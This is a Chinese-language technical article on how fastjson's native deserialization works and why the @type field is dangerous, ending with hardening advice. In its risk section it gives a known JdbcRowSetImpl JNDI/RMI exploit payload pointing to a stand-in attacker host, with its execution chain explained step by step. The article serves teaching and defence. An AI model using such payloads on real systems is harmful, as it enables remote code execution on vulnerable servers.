fastjson 原生反序列化的底层原理和执行流程

一、fastjson 反序列化核心概念

首先明确基础定义：

• 反序列化：将 JSON 字符串转换为 Java 对象的过程，fastjson 作为高性能 JSON 库，其反序列化核心是「基于字节码生成 + 反射」的混合实现。
• 原生反序列化：指 fastjson 默认的反序列化方式（非ParserConfig.getGlobalInstance().setSafeMode(true)等安全模式），支持完整的类加载、属性注入和方法调用。

二、fastjson 原生反序列化核心流程

fastjson 反序列化的完整执行链路可分为 5 个核心步骤，我用流程图+文字拆解：

步骤1：JSON解析器初始化

fastjson 会创建DefaultJSONParser对象，核心参数包括：

• JSON 字符串的字符数组
• 配置类ParserConfig（决定是否允许加载自定义类、是否开启安全模式等）
• 特征配置Feature（如是否允许单引号、是否忽略未知属性等）

核心代码示例：

// 手动初始化解析器（fastjson底层调用逻辑）Stringjson="{\"@type\":\"com.example.User\",\"name\":\"test\"}";ParserConfigconfig=ParserConfig.getGlobalInstance();// 默认全局配置DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.Default);

步骤2：语法解析与Token提取

DefaultJSONParser通过Lexer对 JSON 字符串进行词法分析，将字符串拆分为 Token（如{、}、@type、字符串值、数字值等），核心逻辑：

1. 识别 JSON 结构（对象/数组/基本类型）；
2. 提取关键标识：尤其是@type字段（fastjson 反序列化的核心入口，指定要实例化的类名）；
3. 校验 JSON 语法合法性（如括号匹配、引号闭合等）。

步骤3：类加载与实例化

这是反序列化的核心环节，fastjson 会根据@type指定的类名（或默认类）完成类加载和对象创建：

1. 类加载：通过ParserConfig的checkAutoType方法校验类名（原生模式下默认允许大部分类），然后通过Class.forName加载类；
2. 对象实例化：
   • 优先调用类的无参构造方法（如果没有无参构造且未指定 Creator，会抛出异常）；
   • 支持通过@JSONCreator注解指定有参构造/静态工厂方法；
   • 对于集合/数组等容器类，会创建对应的空容器对象。

核心代码（简化版）：

// 类加载逻辑（ParserConfig核心方法）publicClass<?>checkAutoType(StringtypeName,Class<?>expectClass,intfeatures){// 原生模式下跳过大部分安全校验Class<?>clazz=Class.forName(typeName,true,Thread.currentThread().getContextClassLoader());returnclazz;}// 对象实例化（JavaBeanDeserializer）publicObjectcreateInstance(DefaultJSONParserparser,Typetype){// 优先找无参构造Constructor<?>constructor=clazz.getDeclaredConstructor();constructor.setAccessible(true);returnconstructor.newInstance();}

步骤4：属性注入与方法调用

实例化对象后，fastjson 会遍历 JSON 中的键值对，完成属性赋值，核心逻辑：

1. 属性匹配：将 JSON 的 key 与 Java 类的字段名/setter 方法匹配（支持驼峰/下划线自动转换）；
2. 类型转换：将 JSON 中的字符串/数字等值转换为 Java 字段的类型（如 String → Integer、JSON 对象 → 嵌套 Java 对象）；
3. 赋值方式：
   • 优先调用setXxx()方法（符合 JavaBean 规范）；
   • 如果没有 setter，直接通过反射设置字段值（field.setAccessible(true)）；
4. 特殊方法调用：
   • 对于实现java.io.Externalizable的类，会调用readExternal方法；
   • 对于自定义反序列化器（ObjectDeserializer），会调用其deserialze方法。

步骤5：返回最终对象

完成所有属性注入后，将实例化并赋值完成的 Java 对象返回，反序列化流程结束。

三、fastjson 反序列化关键组件

四、原生反序列化的核心风险（深度剖析重点）

fastjson 原生反序列化的最大问题在于@type字段的滥用，核心风险点：

1. 任意类加载：原生模式下checkAutoType校验宽松，攻击者可通过@type指定危险类（如com.sun.rowset.JdbcRowSetImpl）；
2. 反射执行恶意代码：危险类实例化后，其属性注入过程会触发敏感方法（如JdbcRowSetImpl的setDataSourceName会触发 JNDI 调用，进而加载远程恶意类）；
3. 无参构造触发风险：部分危险类的无参构造方法本身就会执行敏感逻辑（如文件写入、命令执行）。

典型恶意 JSON 示例：

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker.com/malicious.class","autoCommit":true}

执行流程：

1. 加载JdbcRowSetImpl类 → 实例化（无参构造）；
2. 注入dataSourceName属性（调用setDataSourceName）；
3. 注入autoCommit属性（调用setAutoCommit，内部触发connect方法，访问 RMI 服务器加载恶意类）；
4. 恶意类执行命令，完成攻击。

五、fastjson 反序列化优化/安全配置

为了规避风险，实际使用中需调整配置：

1. 开启安全模式：

   ParserConfig.getGlobalInstance().setSafeMode(true);

2. 白名单控制：

   ParserConfigconfig=newParserConfig();config.addAccept("com.example.");// 只允许反序列化指定包下的类

3. 禁用@type字段：

   DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.DisableSpecialKeyDetect);

总结

1. fastjson 原生反序列化核心是「解析 JSON → 加载类 → 实例化对象 → 反射注入属性」，依赖ParserConfig控制类加载规则；
2. @type字段是反序列化的核心入口，也是安全风险的主要来源，原生模式下校验宽松易导致任意代码执行；
3. 生产环境必须开启安全模式/白名单，禁用不必要的@type解析，避免反序列化漏洞。